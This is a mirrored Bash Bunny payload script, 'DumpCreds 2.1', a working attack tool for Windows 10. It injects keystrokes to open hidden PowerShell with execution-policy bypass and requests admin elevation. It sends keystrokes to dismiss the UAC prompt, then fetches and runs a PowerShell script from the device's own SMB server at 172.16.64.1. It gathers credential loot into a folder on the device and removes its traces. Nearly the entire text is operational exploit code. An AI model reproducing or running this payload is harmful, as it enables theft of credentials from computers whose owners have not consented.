mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
166 lines
5.0 KiB
Bash
166 lines
5.0 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: DumpCreds 2.1
|
|
# Author: QDBA
|
|
# Version: 2.1.0
|
|
# Build: 1004
|
|
# Category: Exfiltration
|
|
# Target: Windows Windows 10 (Powershell)
|
|
# Attackmodes: HID, Ethernet
|
|
# !!! works only with Bash Bunny FW 1.1 and up !!!
|
|
#
|
|
#
|
|
# LED Status
|
|
# ----------------------- + --------------------------------------------
|
|
# SETUP + Setup
|
|
# FAIL + No /tools/impacket/examples/smbserver.py found
|
|
# FAIL2 + Target did not acquire IP address
|
|
# Yellow single blink + Initialization
|
|
# Yellow double blink + HID Stage
|
|
# Yellow triple blink + Wait for IP coming up
|
|
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
|
|
# Cyan inv quint blink + Powershell scripts running
|
|
# White fast blink + Cleanup, copy Files to <root>/loot
|
|
# Green + Finished
|
|
# ----------------------- + --------------------------------------------
|
|
|
|
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
|
|
|
|
|
|
###### Lets Start ####
|
|
LED SETUP
|
|
|
|
|
|
# Some Variables
|
|
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
|
|
LOOTDIR=$SWITCHDIR/loot
|
|
|
|
# if the file DEBUG in payload folder exist, enter debug mode
|
|
if [ -f $SWITCHDIR/DEBUG ];then
|
|
DEBUG=1 # 1= Debug on / 0= Debug off
|
|
tail -f /var/log/syslog > /tmp/log.txt &
|
|
else
|
|
DEBUG=0
|
|
fi
|
|
|
|
mkdir -p $LOOTDIR
|
|
|
|
REQUIRETOOL impacket
|
|
|
|
# remove old Handshake Files
|
|
rm -f $SWITCHDIR/CON_*
|
|
|
|
# HID STAGE
|
|
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
|
|
logger -t DumpCred_2.1 "### Enter HID Stage ###"
|
|
LED STAGE1
|
|
ATTACKMODE HID
|
|
|
|
Q DELAY 5000
|
|
|
|
# Launch initial cmd
|
|
if [ $DEBUG -eq 1 ]; then
|
|
RUN WIN cmd
|
|
else
|
|
RUN WIN cmd /k mode con lines=1 cols=100
|
|
fi
|
|
|
|
# Launch powershell as admin (red window)
|
|
Q DELAY 1000
|
|
if [ $DEBUG -eq 1 ]; then
|
|
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
|
|
else
|
|
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
|
|
fi
|
|
Q DELAY 500
|
|
Q ENTER
|
|
|
|
|
|
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
|
|
|
|
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
|
|
# now the second powershell command goes to the admin cmd windows.
|
|
|
|
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
|
|
# the second powershell command goes to the cmd Windows I open first.
|
|
Q DELAY 1000
|
|
Q ALT j
|
|
Q DELAY 500
|
|
Q ENTER
|
|
|
|
Q DELAY 1000
|
|
Q ALT n
|
|
Q DELAY 500
|
|
Q ENTER
|
|
|
|
LED STAGE2
|
|
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
|
|
Q DELAY 500
|
|
if [ $DEBUG -eq 1 ]; then
|
|
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\""
|
|
else
|
|
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
|
|
fi
|
|
Q DELAY 1000
|
|
Q ENTER
|
|
|
|
|
|
logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
|
|
# Ethernet Tage
|
|
LED STAGE3
|
|
ATTACKMODE RNDIS_ETHERNET
|
|
# Source bunny_helpers.sh to get environment variables
|
|
|
|
logger -t DumpCred_2.1 "### Start SMBServer ###"
|
|
# Start SMB Server
|
|
/tools/impacket/examples/smbserver.py e $SWITCHDIR &
|
|
|
|
# Give target a chance to start exfiltration
|
|
sleep 2
|
|
|
|
GET TARGET_IP
|
|
# Check target IP address. If unset, blink slow red.
|
|
if [ -z "${TARGET_IP}" ]; then
|
|
LED FAIL2
|
|
logger -t DumpCred_2.1 "### No Target_IP ###"
|
|
logger -t DumpCred_2.1 "### Failed ###"
|
|
exit
|
|
fi
|
|
logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###"
|
|
|
|
LED STAGE4
|
|
# Handshake Bunny and Computer
|
|
while ! [ -f $SWITCHDIR/CON_REQ ]; do
|
|
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###"
|
|
sleep 1
|
|
done
|
|
mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK
|
|
|
|
LED Y VERYFAST
|
|
# Wait until CON_EOF - Computer set it if all is ready
|
|
while ! [ -f $SWITCHDIR/CON_EOF ]; do
|
|
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###"
|
|
sleep 2
|
|
done
|
|
|
|
LED CLEANUP
|
|
# Cleanup
|
|
logger -t DumpCred_2.1 "### cleanup and copy files ###"
|
|
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
|
|
mkdir -p /root/udisk/loot/DumpCred_2.1
|
|
fi
|
|
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
|
|
rmdir $LOOTDIR
|
|
rm -f $SWITCHDIR/CON_EOF
|
|
|
|
logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################"
|
|
|
|
# realy the end....
|
|
if [ $DEBUG -eq 1 ]; then
|
|
killall tail
|
|
cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/
|
|
fi
|
|
|
|
ATTACKMODE RNDIS_ETHERNET STORAGE
|
|
sync; sleep 1; sync
|
|
LED FINISH |